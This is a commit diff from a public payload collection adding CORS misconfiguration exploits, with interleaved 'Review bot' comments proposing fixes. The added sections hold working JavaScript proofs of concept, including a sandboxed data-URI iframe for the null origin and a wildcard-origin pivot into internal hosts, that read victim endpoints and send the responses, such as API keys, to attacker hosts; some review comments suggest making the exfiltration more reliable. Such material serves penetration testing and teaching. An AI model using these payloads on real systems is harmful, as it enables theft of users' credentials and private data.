mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Merge pull request #180 from mindfuckup/master
Added: Other CORS Misconfigurations
commit
bc8dd0b784
@ -12,13 +12,15 @@
|
|||||||
|
|
||||||
* BURP HEADER> `Origin: https://evil.com`
|
* BURP HEADER> `Origin: https://evil.com`
|
||||||
* VICTIM HEADER> `Access-Control-Allow-Credential: true`
|
* VICTIM HEADER> `Access-Control-Allow-Credential: true`
|
||||||
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com`
|
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
|
||||||
|
|
||||||
## Exploitation
|
## Exploitation
|
||||||
|
|
||||||
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
|
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
|
||||||
|
|
||||||
### Vulnerable example
|
### Vulnerable Example: Origin Reflection
|
||||||
|
|
||||||
|
#### Vulnerable Implementation
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
GET /endpoint HTTP/1.1
|
GET /endpoint HTTP/1.1
|
||||||
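Review bot: the detection checklist in this hunk now offers `Access-Control-Allow-Origin: null` as an alternative outcome, but the only probe header listed is `Origin: https://evil.com`; a server that trusts the null origin normally answers `Access-Control-Allow-Origin: null` only when the request itself carried `Origin: null`, so add a second Burp line, `Origin: null`, or the `OR` branch cannot actually be observed. While these lines are being touched, the response header name in the checklist, `Access-Control-Allow-Credential: true`, is missing the trailing `s`; the real header is `Access-Control-Allow-Credentials: true`, as the context line at the top of the next hunk shows. Minor style point: tagging an HTTP request/response block as ```powershell is misleading, `http` fits better.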
@ -33,7 +35,7 @@ Access-Control-Allow-Credentials: true
|
|||||||
{"[private API key]"}
|
{"[private API key]"}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Proof of concept
|
#### Proof of concept
|
||||||
|
|
||||||
```js
|
```js
|
||||||
var req = new XMLHttpRequest();
|
var req = new XMLHttpRequest();
|
||||||
@ -74,6 +76,93 @@ or
|
|||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Vulnerable Example: Null Origin
|
||||||
|
|
||||||
|
#### Vulnerable Implementation
|
||||||
|
|
||||||
|
It's possible that the server does not reflect the complete `Origin` header but
|
||||||
|
that the `null` origin is allowed. This would look like this in the server's
|
||||||
|
response:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /endpoint HTTP/1.1
|
||||||
|
Host: victim.example.com
|
||||||
|
Origin: null
|
||||||
|
Cookie: sessionid=...
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Access-Control-Allow-Origin: null
|
||||||
|
Access-Control-Allow-Credentials: true
|
||||||
|
|
||||||
|
{"[private API key]"}
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Proof of concept
|
||||||
|
|
||||||
|
This can be exploited by putting the attack code into an iframe using the data
|
||||||
|
URI scheme. If the data URI scheme is used, the browser will use the `null`
|
||||||
|
origin in the request:
|
||||||
|
|
||||||
|
```html
|
||||||
|
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
|
||||||
|
var req = new XMLHttpRequest ();
|
||||||
|
req.onload = reqListener;
|
||||||
|
req.open('get','https://victim.example.com/endpoint',true);
|
||||||
|
req.withCredentials = true;
|
||||||
|
req.send();
|
||||||
|
|
||||||
|
function reqListener() {
|
||||||
|
location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
|
||||||
|
};
|
||||||
|
</script>"></iframe>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Vulnerable Example: XSS on Trusted Origin
|
||||||
|
|
||||||
|
If the application does implement a strict whitelist of allowed origins, the
|
||||||
|
exploit codes from above do not work. But if you have an XSS on a trusted
|
||||||
|
origin, you can inject the exploit coded from above in order to exploit CORS
|
||||||
|
again.
|
||||||
|
|
||||||
|
```
|
||||||
|
https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Vulnerable Example: Wildcard Origin `*` without Credentials
|
||||||
|
|
||||||
|
If the server responds with a wildcard origin `*`, the browser does never send
|
||||||
|
the cookies. Howver, if the server does not require authentication, it's still
|
||||||
|
possible to access the data on the server. This can happen on internal servers
|
||||||
|
that are not accessible from the Internet. The attacker's website can then
|
||||||
|
pivot into the internal network and access the server's data withotu
|
||||||
|
authentication.
|
||||||
|
|
||||||
|
#### Vulnerable Implementation
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
GET /endpoint HTTP/1.1
|
||||||
|
Host: api.internal.example.com
|
||||||
|
Origin: https://evil.com
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Access-Control-Allow-Origin: *
|
||||||
|
|
||||||
|
{"[private API key]"}
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Proof of concept
|
||||||
|
|
||||||
|
```js
|
||||||
|
var req = new XMLHttpRequest();
|
||||||
|
req.onload = reqListener;
|
||||||
|
req.open('get','https://api.internal.example.com/endpoint',true);
|
||||||
|
req.send();
|
||||||
|
|
||||||
|
function reqListener() {
|
||||||
|
location='//atttacker.net/log?key='+this.responseText;
|
||||||
|
};
|
||||||
|
```
|
||||||
|
|
||||||
## Bug Bounty reports
|
## Bug Bounty reports
|
||||||
|
|
||||||
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
|
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
|
||||||
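Review bot: the wildcard section's statement "the browser does never send the cookies" is imprecise and should be reworded; with `Access-Control-Allow-Origin: *` the browser refuses to expose a credentialed response (a request with `withCredentials = true` fails the CORS check, even though the cookie may still be sent on the wire), and a request without `withCredentials`, as in the PoC below it, simply carries no cookie. The attack therefore depends on the endpoint not requiring authentication, which is what the text goes on to say; "the browser will not expose a credentialed response, so the attack only works against endpoints that need no authentication" states that correctly. The same hunk has several typos in added lines: "Howver" should be "However", "withotu" should be "without", "exploit codes from above" and "exploit coded from above" should both read "exploit code from above", and the exfiltration host `//atttacker.net/log` has a triple `t`. The two proofs of concept are also inconsistent: the null-origin one wraps `this.responseText` in `encodeURIComponent`, the wildcard one concatenates it raw into `location`, so a `&` or `#` in the stolen response would truncate the exfiltrated value; use `encodeURIComponent` in both. Finally, the null-origin response block is an untagged fence while the wildcard one is tagged ```powershell; pick one tag (`http`) for all three request/response examples.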
@ -88,3 +177,4 @@ or
|
|||||||
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
|
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
|
||||||
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
|
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
|
||||||
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
|
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
|
||||||
|
* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors)
|
||||||
|
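Review bot: the new reference `PortSwigger Web Security Academy: CORS` does not follow the `Title - Author - Date` pattern the other entries in this list use; add the author (PortSwigger) and, if one is known, a date so the list stays uniform.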